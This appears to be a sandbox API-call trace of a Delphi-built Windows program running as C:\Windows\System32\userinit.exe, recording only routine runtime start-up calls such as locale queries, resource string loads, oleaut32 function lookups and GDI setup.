[0157.548] GetStartupInfoA (in: lpStartupInfo=0x24f8f4 | out: lpStartupInfo=0x24f8f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0157.548] GetVersion () returned 0x1db10106
[0157.548] GetVersion () returned 0x1db10106
[0157.548] GetCurrentThreadId () returned 0x6e4
[0157.548] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x24f3f0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0157.548] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24f2cb, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0157.548] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x24f3e0 | out: phkResult=0x24f3e0*=0x0) returned 0x2
[0157.548] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x24f3e0 | out: phkResult=0x24f3e0*=0x0) returned 0x2
[0157.549] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x24f3e0 | out: phkResult=0x24f3e0*=0x0) returned 0x2
[0157.549] lstrcpynA (in: lpString1=0x24f2cb, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0157.549] GetThreadLocale () returned 0x409
[0157.549] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x24f3db, cchData=5 | out: lpLCData="ENU") returned 4
[0157.550] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0157.550] lstrcpynA (in: lpString1=0x24f2e8, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0157.550] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0157.550] lstrcpynA (in: lpString1=0x24f2e8, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0157.550] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0157.550] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0157.550] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x643640
[0157.551] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x470000
[0157.551] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x644640
[0157.551] VirtualAlloc (lpAddress=0x470000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x470000
[0157.551] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0157.551] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0157.551] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0157.551] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0157.551] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0157.551] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0157.551] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0157.551] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0157.551] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0157.551] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0157.552] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0157.552] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0157.552] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0157.552] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0157.552] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0157.552] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0157.552] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0157.552] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0157.552] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0157.552] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0157.552] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0157.552] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0157.552] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0157.552] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0157.552] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0157.552] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0157.552] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0157.552] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x24f514, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0157.552] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x24f500, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0157.552] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x24f500, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0157.552] GetVersionExA (in: lpVersionInformation=0x24f898*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24f898*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0157.552] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0157.552] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0157.552] GetThreadLocale () returned 0x409
[0157.552] GetThreadLocale () returned 0x409
[0157.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x24f770, cchData=256 | out: lpLCData="Jan") returned 4
[0157.552] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x24f770, cchData=256 | out: lpLCData="January") returned 8
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x24f770, cchData=256 | out: lpLCData="Feb") returned 4
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x24f770, cchData=256 | out: lpLCData="February") returned 9
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x24f770, cchData=256 | out: lpLCData="Mar") returned 4
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x24f770, cchData=256 | out: lpLCData="March") returned 6
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x24f770, cchData=256 | out: lpLCData="Apr") returned 4
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x24f770, cchData=256 | out: lpLCData="April") returned 6
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x24f770, cchData=256 | out: lpLCData="May") returned 4
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x24f770, cchData=256 | out: lpLCData="May") returned 4
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x24f770, cchData=256 | out: lpLCData="Jun") returned 4
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x24f770, cchData=256 | out: lpLCData="June") returned 5
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x24f770, cchData=256 | out: lpLCData="Jul") returned 4
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x24f770, cchData=256 | out: lpLCData="July") returned 5
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x24f770, cchData=256 | out: lpLCData="Aug") returned 4
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x24f770, cchData=256 | out: lpLCData="August") returned 7
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x24f770, cchData=256 | out: lpLCData="Sep") returned 4
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x24f770, cchData=256 | out: lpLCData="September") returned 10
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x24f770, cchData=256 | out: lpLCData="Oct") returned 4
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x24f770, cchData=256 | out: lpLCData="October") returned 8
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x24f770, cchData=256 | out: lpLCData="Nov") returned 4
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x24f770, cchData=256 | out: lpLCData="November") returned 9
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x24f770, cchData=256 | out: lpLCData="Dec") returned 4
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x24f770, cchData=256 | out: lpLCData="December") returned 9
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x24f770, cchData=256 | out: lpLCData="Sun") returned 4
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x24f770, cchData=256 | out: lpLCData="Sunday") returned 7
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x24f770, cchData=256 | out: lpLCData="Mon") returned 4
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x24f770, cchData=256 | out: lpLCData="Monday") returned 7
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x24f770, cchData=256 | out: lpLCData="Tue") returned 4
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x24f770, cchData=256 | out: lpLCData="Tuesday") returned 8
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x24f770, cchData=256 | out: lpLCData="Wed") returned 4
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x24f770, cchData=256 | out: lpLCData="Wednesday") returned 10
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x24f770, cchData=256 | out: lpLCData="Thu") returned 4
[0157.553] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x24f770, cchData=256 | out: lpLCData="Thursday") returned 9
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x24f770, cchData=256 | out: lpLCData="Fri") returned 4
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x24f770, cchData=256 | out: lpLCData="Friday") returned 7
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x24f770, cchData=256 | out: lpLCData="Sat") returned 4
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x24f770, cchData=256 | out: lpLCData="Saturday") returned 9
[0157.554] GetThreadLocale () returned 0x409
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x24f7cc, cchData=256 | out: lpLCData="$") returned 2
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x24f7cc, cchData=256 | out: lpLCData="0") returned 2
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x24f7cc, cchData=256 | out: lpLCData="0") returned 2
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x24f8c4, cchData=2 | out: lpLCData=",") returned 2
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x24f8c4, cchData=2 | out: lpLCData=".") returned 2
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x24f7cc, cchData=256 | out: lpLCData="2") returned 2
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x24f8c4, cchData=2 | out: lpLCData="/") returned 2
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x24f7cc, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0157.554] GetThreadLocale () returned 0x409
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x24f798, cchData=256 | out: lpLCData="1") returned 2
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x24f7cc, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0157.554] GetThreadLocale () returned 0x409
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x24f798, cchData=256 | out: lpLCData="1") returned 2
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x24f8c4, cchData=2 | out: lpLCData=":") returned 2
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x24f7cc, cchData=256 | out: lpLCData="AM") returned 3
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x24f7cc, cchData=256 | out: lpLCData="PM") returned 3
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x24f7cc, cchData=256 | out: lpLCData="0") returned 2
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x24f7cc, cchData=256 | out: lpLCData="0") returned 2
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x24f7cc, cchData=256 | out: lpLCData="0") returned 2
[0157.554] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x24f8c4, cchData=2 | out: lpLCData=",") returned 2
[0157.554] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0157.555] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0157.555] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0157.555] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0157.555] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0157.555] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0157.555] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0157.555] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0157.555] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0157.555] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0157.555] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0157.555] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0157.555] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0157.555] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0157.555] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0157.556] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0157.556] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0157.556] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0157.556] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0157.556] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0157.556] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0157.556] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0157.556] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0157.556] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0157.556] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0157.556] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0157.557] GetDC (hWnd=0x0) returned 0x480107e1
[0157.557] GetDeviceCaps (hdc=0x480107e1, index=90) returned 96
[0157.557] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0157.557] GetDC (hWnd=0x0) returned 0x480107e1
[0157.557] GetDeviceCaps (hdc=0x480107e1, index=104) returned 0
[0157.557] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0157.557] CreatePalette (plpal=0x24f528) returned 0x9208084e
[0157.557] GetStockObject (i=7) returned 0x1b00017
[0157.557] GetStockObject (i=5) returned 0x1900015
[0157.557] GetStockObject (i=13) returned 0x18a002e
[0157.557] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0157.557] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0157.557] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0157.558] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff2a, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff29, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff28, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff27, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff26, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0157.559] LoadStringA (in: hInstance=0x400000, uID=0xff25, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0157.560] LoadStringA (in: hInstance=0x400000, uID=0xff24, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0157.560] LoadStringA (in: hInstance=0x400000, uID=0xff23, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0157.560] LoadStringA (in: hInstance=0x400000, uID=0xff22, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0157.560] LoadStringA (in: hInstance=0x400000, uID=0xff21, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0157.560] LoadStringA (in: hInstance=0x400000, uID=0xff20, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0157.560] LoadStringA (in: hInstance=0x400000, uID=0xff3f, lpBuffer=0x24f524, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
